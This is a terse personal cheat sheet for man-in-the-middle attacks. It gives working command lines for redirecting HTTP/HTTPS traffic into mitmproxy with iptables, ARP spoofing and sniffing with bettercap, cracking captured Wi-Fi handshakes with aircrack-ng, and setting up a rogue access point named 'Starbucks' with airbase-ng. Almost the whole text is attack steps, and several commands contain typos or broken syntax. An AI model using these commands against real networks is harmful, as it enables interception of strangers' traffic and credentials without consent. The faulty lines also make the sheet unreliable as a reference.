Hooper Labs

Man-In-The-Middle Attacks

mitmproxy

Enable IPv4 Forwarding

	sysctl -w net.inet.ip.forwarding=1

Something Something iptables

	iptables -t nat -A POSTROUTING -i eth0 -j MASQUERADE

Redirect 443 Traffic to mitmproxy (8080)

	sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080

Redirect 80 Traffic to mitmproxy (8080)

	sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080

Run MiTMProxy

	mitmproxy -T --host -e

bettercap

Updates Caplets (only run once)

	sudo bettercap --eval "caplets.update; ui.uipdate;q"

Run HTTP-UI Caplet

	sudo bettercap --caplet http[s]-ui

Show Network

	net.show

Clear Screen

	clear

Cool Caplet View

	 
  cat foo.cap <<EOF
  set ticker.commands 'clear; net.show; events.show 10'
  net.probe ON
  ticker ON
 EOF

Run Caplet

	bettercap --caplet /path/to/foo.cap

Unk.

	bettercap --caplet foo (.:./caplets/:$CAPSPATH:/usr/lcoal/share/bettercap/caplets/)

Show Caplets

	caplets.show

Show Active Modules

	active

Quit

Get Help

	help MODULE_NAME

Use Caplet

	include CAPLET

Alias

	alias MAC NAME

Probe On

	net.probe on

Set ARP Spoofing Targets

	set arp.spoof.targets <ip-addr> Turn on Parameter

Set Sniffing Verbose

	set net.sniff.verbose true

Sniff Network Traffic

	net.sniff on

AirDump

AirCrack-NG

	aircrack-ng traffic.pcap -r /path/to/wordlist.txt

AirBase-NG

	airbase-ng --essid Starbucks -c 1 -a AA:AA:AA:AA:AA:AA -W 1 mon0

AirBase-NG

	airbase-ng --essid Starbucks -c 1 -a AA:AA:AA:AA:AA:AA -W 1 mon1

AirBase-NG

	airbase-ng --essid Starbucks -c 1 -a AA:AA:AA:AA:AA:AA -W 1 mon2

AirBase-NG

	airbase-ng -a aa:aa:aa:aa:aa:aa -c 1 -Z 4 mon0 --essid NoAP

Create SSL Certificate with LetsEncrypt

	https://certbot.eff.org/lets-encrypt/ubuntubionic-apache